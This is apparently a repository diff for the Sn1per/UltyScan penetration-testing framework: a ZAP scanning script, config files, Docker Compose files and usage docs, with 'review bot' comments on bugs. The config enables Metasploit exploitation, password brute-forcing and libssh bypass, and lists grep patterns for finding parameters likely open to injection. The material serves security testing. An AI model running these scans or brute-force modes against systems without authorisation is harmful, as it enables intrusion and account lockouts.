url=target, maxchildren=None, recurse=True, subtreeonly=None)
print('Start Spider scan with user ID: ' + userId +
'. Scan ID equals: ' + scanId)
# Give the spider a chance to start
time.sleep(2)
while (int(spider.status(scanId)) < 100):
print('Spider progress: ' + spider.status(scanId) + '%')
time.sleep(2)
print('Spider scan for user ID ' + userId + ' completed')
if useAjaxSpider:
# Prepare Ajax Spider scan
pprint('Set forced user mode enabled -> ' +
forcedUser.set_forced_user_mode_enabled(boolean=True))
pprint('Set user ID: ' + userId + ' for forced user mode -> ' +
forcedUser.set_forced_user(contextid=contextId,
userid=userId))
# Ajax Spider the target URL
pprint('Ajax Spider the target with user ID: ' + userId + ' -> ' +
ajax.scan(url=target, inscope=None))
# Give the Ajax spider a chance to start
time.sleep(10)
while (ajax.status != 'stopped'):
print('Ajax Spider is ' + ajax.status)
time.sleep(5)
for url in applicationURL:
# Ajax Spider every url configured
pprint('Ajax Spider the URL: ' + url + ' with user ID: ' +
userId + ' -> ' +
ajax.scan(url=url, inscope=None))
# Give the Ajax spider a chance to start
time.sleep(10)
while (ajax.status != 'stopped'):
print('Ajax Spider is ' + ajax.status)
time.sleep(5)
pprint('Set forced user mode disabled -> ' +
forcedUser.set_forced_user_mode_enabled(boolean=False))
print('Ajax Spider scan for user ID ' + userId + ' completed')
# Launch Active Scan with the configured policy on the target url
# and recursively scan every site node
scanId = ascan.scan_as_user(url=target, contextid=contextId,
userid=userId, recurse=True, scanpolicyname=scanPolicyName,
method=None, postdata=True)
print('Start Active Scan with user ID: ' + userId +
'. Scan ID equals: ' + scanId)
# Give the scanner a chance to start
time.sleep(2)
while (int(ascan.status(scanId)) < 100):
print('Active Scan progress: ' + ascan.status(scanId) + '%')
time.sleep(2)
print('Active Scan for user ID ' + userId + ' completed')
else:
# Spider the target and recursively scan every site node found
scanId = spider.scan(url=target, maxchildren=None, recurse=True,
contextname=None, subtreeonly=None)
print('Scan ID equals ' + scanId)
# Give the Spider a chance to start
time.sleep(2)
while (int(spider.status(scanId)) < 100):
print('Spider progress ' + spider.status(scanId) + '%')
time.sleep(2)
print('Spider scan completed')
if useAjaxSpider:
# Ajax Spider the target URL
pprint('Start Ajax Spider -> ' + ajax.scan(url=target, inscope=None))
# Give the Ajax spider a chance to start
time.sleep(10)
while (ajax.status != 'stopped'):
print('Ajax Spider is ' + ajax.status)
time.sleep(5)
for url in applicationURL:
# Ajax Spider every url configured
pprint('Ajax Spider the URL: ' + url + ' -> ' +
ajax.scan(url=url, inscope=None))
# Give the Ajax spider a chance to start
time.sleep(10)
while (ajax.status != 'stopped'):
print('Ajax Spider is ' + ajax.status)
time.sleep(5)
print('Ajax Spider scan completed')
# Launch Active scan with the configured policy on the target url and
# recursively scan every site node
scanId = zap.ascan.scan(url=target, recurse=True, inscopeonly=None,
scanpolicyname=scanPolicyName, method=None, postdata=True)
print('Start Active scan. Scan ID equals ' + scanId)
while (int(ascan.status(scanId)) < 100):
print('Active Scan progress: ' + ascan.status(scanId) + '%')
time.sleep(5)
print('Active Scan completed')
# Give the passive scanner a chance to finish
time.sleep(5)
# If you want to retrieve alerts:
## pprint(zap.core.alerts(baseurl=target, start=None, count=None))
print('HTML report:')
pprint(core.htmlreport())
# To retrieve ZAP report in XML or HTML format
print('XML report')
pprint(core.xmlreport())
if shutdownOnceFinished:
# Shutdown ZAP once finished
pprint('Shutdown ZAP -> ' + core.shutdown())
sys.stdout.close()
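Review bot: the report output is mangled and written to a hardcoded location: `sys.stdout = open("/usr/share/sniper/bin/zap-report.txt", "w")` truncates a file inside the install's bin directory on every run (and fails outright for a user without write access there), and `pprint(core.htmlreport())` / `pprint(core.xmlreport())` print the Python repr of the report string (quoted, newlines escaped, long strings split into parenthesised chunks), so the resulting file is neither valid HTML nor valid XML; write each report with `sys.stdout.write(...)` or `print(...)` to its own file. Three further points: `apiKey=''` is marked MANDATORY but left empty, so every API call is rejected unless key checking is disabled in ZAP, and the key should be read from an argument or environment variable rather than edited into the script; `applicationURL = ['']` is a one-element list, not an empty one, so the loops over it call `core.access_url(url='')` and `ajax.scan(url='')` with an empty URL and the default should be `[]`; and with useContextForScan True and createUser False, `userIdList` stays empty, the `for userId in userIdList` loop body never executes and no spider or active scan is started at all. `targetURL = str(sys.argv[1])` also needs an argument-count check with a usage message, since the script currently dies with an IndexError when run without a target.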

215
conf/bug_bounty_full_brute Normal file

File diff suppressed because one or more lines are too long

215
conf/bug_bounty_quick Normal file

File diff suppressed because one or more lines are too long

219
conf/deep_active_recon Normal file

File diff suppressed because one or more lines are too long

245
conf/default Normal file

@@ -0,0 +1,245 @@
INSTALL_DIR="/usr/share/sniper"
SNIPER_PRO=$INSTALL_DIR/pro.sh
PLUGINS_DIR="$INSTALL_DIR/plugins"
# COLORS
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
REGEX='^[0-9]+$'
# DEFAULT SETTINGS
AUTO_BRUTE="0"
AUTO_VULNSCAN="0"
FULLNMAPSCAN="0"
OSINT="0"
ENABLE_AUTO_UPDATES="1"
REPORT="1"
LOOT="1"
# OUT OF SCOPE
OUT_OF_SCOPE=("www.sn1persecurity.com" "sn1persecurity.com" "*.sn1persecurity.com")
# SN1PER PROFESSIONAL SETTINGS
SNIPER_PRO_CONSOLE_OUTPUT="0"
SN1PER_AUTOLOAD="0"
MAX_HOSTS="2000"
# DEFAULT BROWSER
BROWSER="firefox"
# BURP 2.0 SCANNER CONFIG
BURP_HOST="127.0.0.1"
BURP_PORT="1338"
# OPENVAS CONFIG
OPENVAS="0"
OPENVAS_HOST="127.0.0.1"
OPENVAS_PORT="9390"
OPENVAS_USERNAME="admin"
OPENVAS_PASSWORD=""
OPENVAS_RUNAS_USER="kali"
# NESSUS CONFIG
NESSUS="0"
NESSUS_HOST="127.0.0.1:8834"
NESSUS_USERNAME="admin"
NESSUS_PASSWORD=""
NESSUS_POLICY_ID="c3cbcd46-329f-a9ed-1077-554f8c2af33d0d44f09d736969bf"
# METASPLOIT SCANNER CONFIG
METASPLOIT_IMPORT="0"
MSF_LHOST="127.0.0.1"
MSF_LPORT="4444"
# SHODAN API KEY
SHODAN_API_KEY=""
# CENSYS API KEYS
CENSYS_APP_ID=""
CENSYS_API_SECRET=""
# HUNTER.IO API KEY
HUNTERIO_KEY=""
# TOMBA.IO API
TOMBAIO_KEY=""
TOMBAIO_SECRET=""
# GITHUB API KEY
GITHUB_API_KEY=""
# SLACK API
SLACK_NOTIFICATIONS="0"
SLACK_NOTIFICATIONS_THEHARVESTER="0"
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
SLACK_NOTIFICATIONS_SUBNETS="0"
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
SLACK_NOTIFICATIONS_WHATWEB="0"
SLACK_NOTIFICATIONS_NMAP="0"
SLACK_NOTIFICATIONS_NMAP_DIFF="0"
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
SLACK_NOTIFICATIONS_WHOIS="0"
SLACK_NOTIFICATIONS_METAGOOFIL="0"
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
SLACK_NOTIFICATIONS_EMAIL_FORMAT="0"
# ACTIVE WEB BRUTE FORCE STAGES
WEB_BRUTE_STEALTHSCAN="1"
WEB_BRUTE_COMMONSCAN="1"
WEB_BRUTE_FULLSCAN="0"
WEB_BRUTE_EXPLOITSCAN="0"
WEB_JAVASCRIPT_ANALYSIS="1"
MAX_JAVASCRIPT_FILES="25"
# WEB BRUTE FORCE WORDLISTS
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
WEB_BRUTE_COMMON="$INSTALL_DIR/wordlists/web-brute-common.txt"
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt"
WEB_BRUTE_EXPLOITS="$INSTALL_DIR/wordlists/web-brute-exploits.txt"
WEB_BRUTE_EXTENSIONS="htm,html,asp,aspx,php,jsp,js"
WEB_BRUTE_EXCLUDE_CODES="400,403,404,405,406,429,500,502,503,504"
# GREP PATTERNS
STATIC_GREP_SEARCH="1"
GREP_MAX_LINES="10"
GREP_INTERESTING_SUBDOMAINS="admin|jenkins|test|proxy|stage|test|dev|devops|staff|db|qa|internal"
GREP_EXTENSIONS="\.action|\.adr|\.ascx|\.asmx|\.axd|\.backup|\.bak|\.bkf|\.bkp|\.bok|\.achee|\.cfg|\.cfm|\.cgi|\.cnf|\.conf|\.config|\.crt|\.csr|\.csv|\.dat|\.doc|\.docx|\.eml|\.env|\.exe|\.gz|\.ica|\.inf|\.ini|\.java|\.json|\.key|\.log|\.lst|\.mai|\.mbox|\.mbx|\.md|\.mdb|\.nsf|\.old|\.ora|\.pac|\.passwd|\.pcf|\.pdf|\.pem|\.pgp|\.pl| plist|\.pwd|\.rdp|\.reg|\.rtf|\.skr|\.sql|\.swf|\.tpl|\.txt|\.url|\.wml|\.xls|\.xlsx|\.xml|\.xsd|\.yml"
GREP_PARAMETERS="template=|preview=|id=|view=|activity=|name=|content=|redirect=|(&|[?])access(&|=)|(&|[?])admin(&|=)|(&|[?])dbg(&|=)|(&|[?])debug(&|=)|(&|[?])edit(&|=)|(&|[?])grant(&|=)|(&|[?])test(&|=)|(&|[?])alter(&|=)|(&|[?])clone(&|=)|(&|[?])create(&|=)|(&|[?])delete(&|=)|(&|[?])disable(&|=)|(&|[?])enable(&|=)|(&|[?])exec(&|=)|(&|[?])execute(&|=)|(&|[?])load(&|=)|(&|[?])make(&|=)|(&|[?])modify(&|=)|(&|[?])rename(&|=)|(&|[?])reset(&|=)|(&|[?])shell(&|=)|(&|[?])toggle(&|=)|(&|[?])adm(&|=)|(&|[?])root(&|=)|(&|[?])cfg(&|=)|(&|[?])dest(&|=)|(&|[?])redirect(&|=)|(&|[?])uri(&|=)|(&|[?])path(&|=)|(&|[?])continue(&|=)|(&|[?])url(&|=)|(&|[?])window(&|=)|(&|[?])next(&|=)|(&|[?])data(&|=)|(&|[?])reference(&|=)|(&|[?])site(&|=)|(&|[?])html(&|=)|(&|[?])val(&|=)|(&|[?])validate(&|=)|(&|[?])domain(&|=)|(&|[?])callback(&|=)|(&|[?])return(&|=)|(&|[?])feed(&|=)|(&|[?])host(&|=)|(&|[?])port(&|=)|(&|[?])to(&|=)|(&|[?])out(&|=)|(&|[?])view(&|=)|(&|[?])dir(&|=)|(&|[?])show(&|=)|(&|[?])navigation(&|=)|(&|[?])open(&|=)|(&|[?])file(&|=)|(&|[?])document(&|=)|(&|[?])folder(&|=)|(&|[?])pg(&|=)|(&|[?])php_path(&|=)|(&|[?])style(&|=)|(&|[?])doc(&|=)|(&|[?])img(&|=)|(&|[?])filename(&|=)|id=|select=|report=|role=|update=|query=|user=|name=|sort=|where=|search=|params=|process=|row=|view=|table=|from=|sel=|results=|sleep=|fetch=|order=|keyword=|column=|field=|delete=|string=|number=|filter=|(&|[?])callback=|(&|[?])cgi-bin/redirect.cgi|(&|[?])checkout=|(&|[?])checkout_url=|(&|[?])continue=|(&|[?])data=|(&|[?])dest=|(&|[?])destination=|(&|[?])dir=|(&|[?])domain=|(&|[?])feed=|(&|[?])file=|(&|[?])file_name=|(&|[?])file_url=|(&|[?])folder=|(&|[?])folder_url=|(&|[?])forward=|(&|[?])from_url=|(&|[?])go=|(&|[?])goto=|(&|[?])host=|(&|[?])html=|(&|[?])image_url=|(&|[?])img_url=|(&|[?])load_file=|(&|[?])load_url=|(&|[?])login_url=|(&|[?])logout=|(&|[?])navigation=|(&|[?])next=|(&|[?])next_page=|(&|[?])Open=|(&|[?])out=|(&|[?])page_url=|(&|[?])path=|(&|[?])port=|(&|[?])redir=|(&|[?])redirect=|(&|[?])redire
ct_to=|(&|[?])redirect_uri=|(&|[?])redirect_url=|(&|[?])reference=|(&|[?])return=|(&|[?])return_path=|(&|[?])return_to=|(&|[?])returnTo=|(&|[?])return_url=|(&|[?])rt=|(&|[?])rurl=|(&|[?])show=|(&|[?])site=|(&|[?])target=|(&|[?])to=|(&|[?])uri=|(&|[?])url=|(&|[?])val=|(&|[?])validate=|(&|[?])view=|(&|[?])window=|daemon=|upload=|dir=|execute=|download=|log=|ip=|cli=|cmd=|file=|document=|folder=|root=|path=|pg=|style=|pdf=|template=|php_path=|doc=|page=|name=|id=|user=|account=|number=|order=|no=|doc=|key=|email=|group=|profile=|edit=|report=|access=|admin=|dbg=|debug=|edit=|grant=|test=|alter=|clone=|create=|delete=|disable=|enable=|exec=|execute=|load=|make=|modify=|rename=|reset=|shell=|toggle=|adm=|root=|cfg=|config="
GREP_XSS="q=|s=|search=|lang=|keyword=|query=|page=|keywords=|year=|view=|email=|type=|name=|p=|callback=|jsonp=|api_key=|api=|password=|email=|emailto=|token=|username=|csrf_token=|unsubscribe_token=|id=|item=|page_id=|month=|immagine=|list_type=|url=|terms=|categoryid=|key=|l=|begindate=|enddate="
GREP_SSRF="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|reference|site|html|val|validate|domain|callback|return|page|feed|host|port|to|out|view|dir|show|navigation|open"
GREP_REDIRECT="forward=|dest=|redirect=|uri=|path=|continue=|url=|window=|to=|out=|view=|dir=|show=|navigation=|Open=|file=|val=|validate=|domain=|callback=|return=|page=|feed=|host=|port=|next=|data=|reference=|site=|html="
GREP_RCE="daemon|upload|dir|execute|download|log|ip|cli|cmd"
GREP_IDOR="id|user|account|number|order|no|doc|key|email|group|profile|edit|report"
GREP_SQL="id|select|report|role|update|query|user|name|sort|where|search|params|process|row|view|table|from|sel|results|sleep|fetch|order|keyword|column|field|delete|string|number|filter"
GREP_LFI="file|document|folder|root|path|pg|style|pdf|template|php_path|doc"
GREP_SSTI="template|preview|id|view|activity|name|content|redirect"
GREP_DEBUG="access|admin|dbg|debug|edit|grant|test|alter|clone|create|delete|disable|enable|exec|execute|load|make|modify|rename|reset|shell|toggle|adm|root|cfg|config"
# DOMAIN WORDLISTS
DOMAINS_QUICK="$INSTALL_DIR/wordlists/domains-quick.txt"
DOMAINS_DEFAULT="$INSTALL_DIR/wordlists/domains-default.txt"
# DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-all.txt"
# DEFAULT USER/PASS WORDLISTS
USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
# TOOL DIRECTORIES
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
# FLYOVER MODE TUNING
FLYOVER_MAX_HOSTS="5"
FLYOVER_DELAY="10"
# NMAP OPTIONS
NMAP_OPTIONS="--script-args http.useragent='' --open"
# NMAP PORT CONFIGURATIONS
QUICK_PORTS="21,22,80,443,8000,8080,8443"
DEFAULT_PORTS="10000,1099,110,111,123,135,137,139,1433,1524,161,162,16992,2049,21,2121,2181,22,23,25,264,27017,27018,27019,28017,3128,3306,3310,3389,3632,389,443,4443,445,49152,49180,500,512,513,514,53,5432,5555,5800,5900,5984,623,624,6667,67,68,69,7001,79,80,8000,8001,8080,8180,8443,8888,9200,9495"
FULL_PORTSCAN_PORTS="T:1-65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049"
THREADS="100"
# NETWORK PLUGINS
NMAP_SCRIPTS="1"
METASPLOIT_EXPLOIT="1"
MSF_LEGACY_WEB_EXPLOITS="0"
SSH_AUDIT="1"
SSH_ENUM="1"
LIBSSH_BYPASS="1"
SMTP_USER_ENUM="1"
FINGER_TOOL="1"
SHOW_MOUNT="1"
RPC_INFO="1"
SMB_ENUM="1"
AMAP="0"
# OSINT PLUGINS
WHOIS="1"
GOOHAK="1"
INURLBR="1"
THEHARVESTER="1"
METAGOOFIL="1"
HUNTERIO="0"
TOMBAIO="0"
INTODNS="1"
EMAILFORMAT="1"
ULTRATOOLS="1"
URLCRAZY="1"
VHOSTS="0"
H8MAIL="0"
GITHUB_SECRETS="0"
URLSCANIO="1"
# DYNAMIC APPLICATION SCANNERS
BURP_SCAN="0"
ARACHNI_SCAN="0"
ZAP_SCAN="1"
# ACTIVE WEB PLUGINS
SC0PE_VULNERABLITY_SCANNER="1"
DIRSEARCH="1"
GOBUSTER="0"
NIKTO="0"
BLACKWIDOW="1"
INJECTX="1"
CLUSTERD="0"
WPSCAN="0"
CMSMAP="0"
WAFWOOF="1"
WHATWEB="1"
WIG="0"
SHOCKER="0"
JEXBOSS="0"
WEBTECH="1"
SSL_INSECURE="1"
HTTP_PROBE="0"
SMUGGLER="1"
# PASSIVE WEB PLUGINS
WAYBACKMACHINE="1"
SSL="1"
PASSIVE_SPIDER="1"
GAU="1"
HACKERTARGET="1"
CUTYCAPT="0"
WEBSCREENSHOT="1"
# EMAIL PLUGINS
SPOOF_CHECK="1"
# RECON PLUGINS
SUBHIJACK_CHECK="0"
AQUATONE="0"
SLURP="0"
SUBLIST3R="0"
AMASS="0"
SUBFINDER="0"
DNSCAN="0"
CRTSH="1"
SUBOVER="0"
PROJECT_SONAR="1"
CENSYS_SUBDOMAINS="0"
SUBNET_RETRIEVAL="1"
SUBJACK="0"
ALT_DNS="0"
MASS_DNS="0"
DNSGEN="0"
SHODAN="0"
ASN_CHECK="1"
SPYSE="0"
SUBBRUTE_DNS="0"
GITHUB_SUBDOMAINS="0"
RAPIDDNS="1"
SCAN_ALL_DISCOVERED_DOMAINS="0"
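Review bot: `INURLBR` is assigned twice in this conf with incompatible meanings: `INURLBR="$INSTALL_DIR/bin/inurlbr.php"` under TOOL DIRECTORIES and then `INURLBR="1"` under OSINT PLUGINS, so once the file is sourced the script path is gone and any code that executes `$INURLBR` will try to run `1`. Rename the path variable (for example `INURLBR_PATH`) and update its callers. Two smaller points: `SC0PE_VULNERABLITY_SCANNER` is misspelled, and if it is corrected every reader of that key must change with it; and the `GREP_PARAMETERS` alternation repeats many entries (`id=`, `name=`, `view=`, `redirect=` each appear more than once), so deduplicating it would shorten the line without changing what it matches.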

218
conf/fast_service_portscan Normal file

File diff suppressed because one or more lines are too long

214
conf/super_stealth_mode Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

214
conf/web_mode_all_plugins Normal file

File diff suppressed because one or more lines are too long

212
conf/webpwn_only Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

219
conf/zap_only_webscan Normal file

File diff suppressed because one or more lines are too long


@@ -0,0 +1,14 @@
version: '3.9'
x-logging: &default-logging
options:
max-size: "40m"
max-file: "10"
driver: json-file
services:
blackarch:
container_name: blackarch
build:
context: .
dockerfile: Dockerfile.blackarch
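Review bot: the `x-logging: &default-logging` anchor is declared but none of the visible lines reference it from the `blackarch` service, so the `max-size`/`max-file` caps never take effect; add `logging: *default-logging` under the service (this rendering drops indentation and two of the file's 14 lines, so please confirm against the source). Also, `version: '3.9'` is obsolete in Compose v2 and only produces a warning; it can be dropped.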

14
docker-compose.yml Normal file

@@ -0,0 +1,14 @@
version: '3.9'
x-logging: &default-logging
options:
max-size: "40m"
max-file: "10"
driver: json-file
services:
kali-linux:
container_name: kali-linux
build:
context: .
dockerfile: Dockerfile
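Review bot: as in the BlackArch compose file, `&default-logging` is declared here but not applied to the `kali-linux` service in the visible lines; either add `logging: *default-logging` under the service so the 40m/10-file log caps actually apply, or remove the unused anchor. `version: '3.9'` is likewise ignored by Compose v2 and can go.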

72
docs/configuration.md Normal file

@@ -0,0 +1,72 @@
# Configuration Guide
**UltyScan** is highly configurable. You can adjust scan intensity, timeout settings, and integrate external API keys for enhanced data gathering.
## Main Configuration File
The main configuration file is located at:
`/usr/share/sniper/sniper.conf`
To use a custom configuration for a specific scan, make a copy of this file, edit it, and pass it with the `-c` flag:
```bash
cp /usr/share/sniper/sniper.conf ~/my_custom.conf
nano ~/my_custom.conf
# Edit settings...
sudo sniper -c ~/my_custom.conf -t example.com
```
### Common Settings to Tweak
- **`sc0pe_vulnerable_search`**: Set to `1` to search for specific vulnerabilities.
- **`RISK_LEVEL`**: Adjust the sensitivity of vulnerability scanners.
- **`THREADS`**: Increase number of threads for faster (but noisier) scans.
---
## API Integration
To unlock the full power of **UltyScan**, you should configure API keys for services like Shodan, Censys, and Hunter.io.
### Setting up Keys
1. **Locate or Create the Key Config**:
The system looks for keys in `/root/.sniper_api_keys.conf`.
2. **Edit the File**:
```bash
sudo nano /root/.sniper_api_keys.conf
```
3. **Enter your Keys**:
Add or update the lines for the services you have access to.
```bash
# SHODAN API KEY
SHODAN_API_KEY="your_shodan_key_here"
# CENSYS API KEY
CENSYS_API_ID="your_censys_id"
CENSYS_API_SECRET="your_censys_secret"
# HUNTER.IO API KEY
HUNTER_API_KEY="your_hunter_key"
# GITHUB API KEY
GITHUB_API_KEY="your_github_token"
```
4. **Save and Exit**:
Press `Ctrl+X`, then `Y`, then `Enter`.
### Supported Integrations
- **Shodan**: For discovering internet-connected devices.
- **Censys**: For attack surface visibility.
- **Hunter.io**: For email and contact discovery.
- **GitHub**: For repo scanning and updates.
- **OWASP ZAP**: For web application scanning.
- **BurpSuite Pro**: For advanced web scanning (requires manual config).
- **Metasploit**: For exploit validation.
---
[Return to README](../README.md)
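Review bot: under "Common Settings to Tweak" the key is written as `sc0pe_vulnerable_search`, but every key in the shipped sniper.conf hunk is uppercase (the closest match is `SC0PE_VULNERABLITY_SCANNER="1"`), so a reader who copies the name as printed will edit a setting that nothing reads; please use the exact key names from the conf. Since `/root/.sniper_api_keys.conf` holds Shodan, Censys, Hunter.io and GitHub credentials, step 4 should also tell the user to run `chmod 600 /root/.sniper_api_keys.conf`; the installer symlinks this file into `/usr/share/sniper/conf/`, so restrictive permissions on the real file are what protect it.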

127
docs/installation.md Normal file

@@ -0,0 +1,127 @@
# Installation Guide
Welcome to the **UltyScan** installation guide. This document provides step-by-step instructions to get **UltyScan** up and running on your system.
## Table of Contents
1. [Prerequisites](#prerequisites)
2. [Native Installation (Kali Linux / Ubuntu / Debian)](#native-installation)
3. [Docker Installation (Recommended for others)](#docker-installation)
4. [Troubleshooting](#troubleshooting)
---
## Prerequisites
Before installing, ensure you have:
- **Operating System**: Kali Linux (preferred), Ubuntu, Debian, or Parrot OS.
- **Permissions**: Root (administrator) access is required. Use `sudo` if you are not logged in as root.
- **Internet Connection**: Required to download dependencies.
---
## Native Installation
This is the standard installation method for Kali Linux, Ubuntu, and Debian systems.
### Step 1: Clone the Repository
Open your terminal (command prompt) and run the following command to download the **UltyScan** code to your computer.
```bash
git clone https://github.com/1N3/Sn1per
```
*Note: This creates a folder named `Sn1per`. You can rename it to `UltyScan` if you wish, but the internal scripts expect standard paths.*
### Step 2: Navigate to the Directory
Move into the downloaded folder:
```bash
cd Sn1per
```
### Step 3: Run the Installer
Run the installation script. This script will automatically download and install all necessary tools and dependencies.
**Warning**: This process can take a while (10-30 minutes) depending on your internet speed, as it installs many security tools.
```bash
sudo bash install.sh
```
### Step 4: Verification
Once the script finishes, verify the installation by running the scanner's help command:
```bash
sudo sniper --help
```
If you see the help menu with the logo, the installation was successful!
---
## Docker Installation
If you are not using Kali/Debian, or prefer a containerized environment, use Docker. This keeps your host system clean.
### Prerequisites
- Ensure **Docker** and **Docker Compose** are installed on your system.
- [Install Docker Engine](https://docs.docker.com/engine/install/)
- [Install Docker Compose](https://docs.docker.com/compose/install/)
### Option A: Kali Linux Container (Recommended)
1. **Start the container**:
From within the `Sn1per` directory, run:
```bash
sudo docker compose up -d
```
*The `-d` flag runs it in the background.*
2. **Access the container**:
To start using the scanner, enter the interactive shell:
```bash
sudo docker run --privileged -it sn1per-kali-linux /bin/bash
```
3. **Run the tool**:
Inside the container, you can run:
```bash
sniper --help
```
### Option B: BlackArch Container
If you prefer BlackArch Linux:
1. **Start the container**:
```bash
sudo docker compose -f docker-compose-blackarch.yml up -d
```
2. **Access the container**:
```bash
sudo docker run --privileged -it sn1per-blackarch /bin/bash
```
---
## Troubleshooting
### "Command not found"
If running `sniper` says command not found:
- Ensure you ran the install script as root (`sudo bash install.sh`).
- Try running it directly from the installation directory:
```bash
cd /usr/share/sniper
./sniper --help
```
### Dependency Errors
If the installer fails on a specific package:
1. Run `sudo apt update --fix-missing`
2. Run `sudo apt upgrade`
3. Re-run `./install.sh`
### Docker "Permission Denied"
If you get permission errors with Docker, ensure your user is in the `docker` group or use `sudo` before docker commands.
---
[Return to README](../README.md)
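Review bot: in Option A step 2, `sudo docker run --privileged -it sn1per-kali-linux /bin/bash` does not enter the container started by `docker compose up -d` in step 1; it creates a second, unrelated container from the image, so anything written inside it is not in the compose-managed container. Use `sudo docker compose exec kali-linux /bin/bash` (the service name from docker-compose.yml), or `sudo docker compose run --rm kali-linux /bin/bash` if the container does not stay up, and the same for Option B with the `blackarch` service. The image name `sn1per-kali-linux` is derived from the project directory being called `Sn1per`, so the Step 1 note that the folder may be renamed to `UltyScan` would silently break that command. Minor: the Dependency Errors section says `./install.sh` while Step 3 says `sudo bash install.sh`; keep one form.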

130
docs/usage.md Normal file

@@ -0,0 +1,130 @@
# Usage Guide
This guide covers how to use **UltyScan** effectively. The tool works by running the `sniper` command followed by a target and a mode.
## Basic Syntax
```bash
sudo sniper -t <TARGET> -m <MODE> [OPTIONS]
```
- `-t <TARGET>`: The domain (e.g., `example.com`) or IP address (e.g., `192.168.1.1`) you want to scan.
- `-m <MODE>`: The scanning mode (e.g., `normal`, `stealth`, `nuke`). if omitted, defaults to normal.
- `-w <WORKSPACE>`: (Optional) Save results to a specific workspace name.
---
## Scanning Modes
### 1. Normal Mode
**Best for:** General purpose scanning.
Performs a basic scan of targets and open ports using both active and passive checks. It balances speed and depth.
**Command:**
```bash
sudo sniper -t example.com
```
*Note: If no mode is specified, Normal mode is used.*
### 2. Stealth Mode
**Best for:** Avoiding detection.
Quickly enumerates targets using mostly non-intrusive scans to avoid WAF (Web Application Firewall) or IPS (Intrusion Prevention System) blocking.
**Command:**
```bash
sudo sniper -t example.com -m stealth
```
### 3. Flyover Mode
**Best for:** High-level overview of multiple targets.
Fast, multi-threaded scans of multiple targets. Great for collecting high-level data (like taking screenshots of web pages) on many hosts quickly.
**Command:**
```bash
sudo sniper -f targets.txt -m flyover -w my-flyover-scan
```
### 4. Airstrike Mode
**Best for:** Quick enumeration of a list of targets.
Quickly enumerates open ports and services on multiple hosts and performs basic fingerprinting.
**Command:**
```bash
sudo sniper -f targets.txt -m airstrike
```
*Note: `targets.txt` should contain a list of IPs or domains, one per line.*
### 5. Nuke Mode
**Best for:** COMPLETE DESTRUCTION (Deep Audit).
Launches a full audit of multiple hosts. This enables Brute-force, Full Port Scan, OSINT, Recon, Workspace, and Loot collection. **This is very loud and will likely lock accounts or trigger alarms.**
**Command:**
```bash
sudo sniper -f targets.txt -m nuke -w my-nuke-scan
```
### 6. Discover Mode
**Best for:** Internal Networks.
Parses all hosts on a subnet (CIDR) and initiates a scan against each active host.
**Command:**
```bash
sudo sniper -t 192.168.1.0/24 -m discover -w internal-scan
```
### 7. Web Mode
**Best for:** Web Application focus.
Adds full automatic web application scans to the results. Scans ports 80 (HTTP) and 443 (HTTPS) only.
**Command:**
```bash
sudo sniper -t example.com -m web
```
---
## Workspace Management
UltyScan saves all data into "Workspaces" to keep your scans organized.
### Creating/Using a Workspace
Simply add `-w <NAME>` to any command.
```bash
sudo sniper -t example.com -w project-alpha
```
### Listing Workspaces
See all your current workspaces.
```bash
sudo sniper --list
```
### Deleting a Workspace
Remove a workspace and all its data.
```bash
sudo sniper -w project-alpha -d
```
### Viewing Reports
To open the HTML report for a workspace:
```bash
sudo sniper --list
```
Then select the report HTML file from the output or navigate to:
`/usr/share/sniper/loot/workspace/<YOUR_WORKSPACE>/sniper-report.html`
---
## Advanced Options
| Flag | Description |
| :--- | :--- |
| `-o` / `--osint` | Enable OSINT (Open Source Intelligence) gathering. |
| `-re` / `--recon` | Enable Reconnaissance gathering. |
| `-b` | Enable Brute-force attacks (automatically tries passwords). |
| `-fp` | Full Port Only scan (scans all 65535 ports). |
| `--status` | Check the status of running scans. |
| `-u` / `--update` | Update **UltyScan** to the latest version. |
---
[Return to README](../README.md)
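Review bot: the Viewing Reports subsection gives `sudo sniper --list` as the command to open a report, which is the same command already shown under Listing Workspaces and does not open anything; either document the flag that actually exports or opens the report, or keep only the path. That path, `/usr/share/sniper/loot/workspace/<YOUR_WORKSPACE>/sniper-report.html`, uses `workspace`, while install.sh creates `loot/workspaces/` and links that directory to the Desktop, so one of the two spellings is wrong. Style: "if omitted, defaults to normal" in the `-m` bullet should start with a capital letter.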

467
install.sh Normal file

@@ -0,0 +1,467 @@
#!/bin/bash
# Install script for Sn1per CE
# Created by @xer0dayz - https://sn1persecurity.com
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
